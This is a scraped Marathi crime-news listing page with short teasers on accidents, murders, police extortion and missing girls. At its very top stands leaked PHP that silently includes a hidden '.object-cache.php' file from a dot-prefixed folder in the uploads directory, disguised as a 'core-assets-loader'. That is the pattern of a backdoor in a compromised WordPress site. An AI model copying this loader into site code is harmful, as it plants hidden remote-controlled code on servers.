add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

राजस्थानमधील बाडमेर जिल्ह्यातील चौहटनमधील डोंगर भागातील मार्गावरून जवानांना घेऊन जाणारा हवाई दलाचा ट्रक दरीत कोसळल्याने मोठी दुर्घटना घडली. या भीषण दुर्घटनेत तीन जवानांचा घटनास्थळीच मृत्यू झाला. तर तीन जवान गंभीर जखमी झाल्याने त्यांना तातडीने रूग्णालयात दाखल करण्यात आले आहे. या ट्रकमध्ये एकूण सहा जवान होते. प्राप्त माहितीनुसार चौहटनमधील डोंगर...

Read More

अमेरिकेमधील न्यू जर्सीमधील एका तरुणीवर तिच्या प्रियकराचे घर जाळल्याचा आरोप करण्यात आला आहे. प्रियकराने या तरुणीला रात्री उशीरा फोन करुन ‘पहाटे चार वाजता सेक्स करण्यासाठी घरी ये’ अशी मागणी केली. मात्र ही तरुणी जेव्हा त्याच्या घरी पोहचली तेव्हा तो झोपी गेल्याने त्याने घराचा दरवाजा उघडला नाही. रागाच्याभरात या तरुणीने...

Read More

भरधाव वेगात गाडी चालवणाऱ्या केरळ केडरच्या आयएएस अधिकाऱ्याच्या कारने बाईकला धडक दिली. या अपघातात बाईकवरील स्थानिक पत्रकाराचा मृत्यू झाला. के.एम.बशीर (३५) असे मृत व्यक्तीचे नाव असून ते एका मल्याळम वर्तमानपत्रात ब्युरो चीफ पदावर कार्यरत होते. तिरुअनंतपुरममध्ये शनिवारी मध्यरात्रीच्या सुमारास हा अपघात घडला. २०१२ बॅचचे आयएएस अधिकारी असणारे श्रीराम वेंकटरामन...

Read More

नवी मुंबईच्या खारघर परिसरातील एका हॉटेल मालकावर हप्ता न दिल्याच्या रागातून स्थानिक पोलिस निरीक्षकाकडून मारहाण करण्यात आली आहे. पोलिसानी हॉटेलमध्ये जाऊन मालकाला मारहाण करतानाचा घटना सीसीटीव्हीमध्ये कैद झाली आहे. खारघर पोलीस स्थानकातील वरिष्ठ पोलिस निरीक्षकावर मारहाण केल्याचा आरोप हॉटेल मालकाकडून करण्यात आला आहे. हप्ता देण्यास नकार दिल्यामुळे पोलिसाने मारहाण...

Read More

कॅफे कॉफी डेचे मालक व्ही. जी. सिद्धार्थ यांचा मृत्यू झाला आहे. त्यांचा मृतदेह नेत्रावती नदीमध्ये सापडला आहे. ते सोमवारपासून बेपत्ता होते. व्ही. जी. सिद्धार्थ हे कॅफे कॉफी डेचे संस्थापक, मालक आणि भाजपा नेते एस. एम. कृष्णा यांचे जावई होते. गेल्या ३६ तासांपासून कॅफे कॉफी डेचे मालक व्ही. जी. सिद्धार्थ...

Read More

धोक्याची पातळी ओलांडल्यामुळे दिल्लीतील हवा ही दिवसेंदिवस जीवघेणी होऊ लागली आहे. या दुषीत हवेमुळे एका तरुणीला कॅन्सर सारख्या दुर्धर आजाराने ग्रासल्याची बाब समोर आली आहे. दिल्लीतील ही पहिलीच घटना असल्याचे डॉक्टरांनी सांगितल्याने खळबळ उडाली आहे. दिल्लीतील विषारी हवेमुळे लोकांमध्ये फुप्फुसांचा आजार बळावत चालला आहे. सर गंगाराम रुग्णालयातील डॉक्टरांनी एका...

Read More

मध्य प्रदेशातील इंदोरमध्ये गुदद्वारात हवा भरल्याने सहा वर्षांच्या मुलाचा मृत्यू झाल्याची धक्कादायक घटना घडली आहे. रविवारी ही घटना घडली. मित्रांनी खेळताना मुलाच्या गुदद्वारात एअर कॉम्प्रेसर घुसवून हवा भरण्याचा प्रयत्न केल्याने मृत्यू झाल्याची माहिती पोलिसांनी दिली आहे. पोलीस अधिकारी संजय शुक्ला यांनी मुलाची ओळख पटली असून कान्हा यादव असं त्यांच...

Read More

मुंबईतल्या घाटकोपरमध्ये पूर्व वैमनस्यातून एका तरुणाची हत्या करण्यात आली. मित्रांनीच कट रचून मित्राच्या वाढदिवसाच्या दिवशीच त्याला ठार केलं. नितेश सावंत असं हत्या झालेल्या तरुणाचं नाव आहे. नितेश त्याच्या मित्रासोबत एका पार्कमध्ये वाढदिवस साजरा करत होता. त्याचवेळी त्याच्या मित्रांनी त्याच्यावर धारदार शस्त्रांनी वार करण्यास सुरुवात केली. नितेशवर हल्ला केल्यानंतर हे...

Read More

दिल्ली महिला आयोग को 3 जुलाई को दिल्ली के किराड़ी से 4 लड़कियों के गायब होने सूचना मिली. दो लड़कियां जिनकी उम्र 17 साल और 15 साल थी, वे सगी बहनें हैं. इसके अलावा दो अन्य 14 साल की लड़कियां उनकी पड़ोसी थीं. ये सभी नाबालिग लड़कियां दिल्ली महिला...

Read More

आपल्या डान्स मूव्हजने अनेकांची मने जिंकणारी अभिनेत्री म्हणजे नोरा फतेही. सध्या नोरा ‘ओ साकी साकी’ गाण्याच्या रिक्रिएटेड व्हर्जनमुळे चर्चेत आहे. हे गाणे जॉन अब्राहमचा आगामी चित्रपट ‘बाटला हाउस’ मधील आहे. हे गाणे प्रदर्शित झाल्यापासून या गाण्यातील दिलखेचक अदांनी नोराने प्रेक्षकांची मने जिंकली आहेत. परंतु नोराचा कॅनडा ते बॉलिवूड चित्रपटसृष्टी...

Read More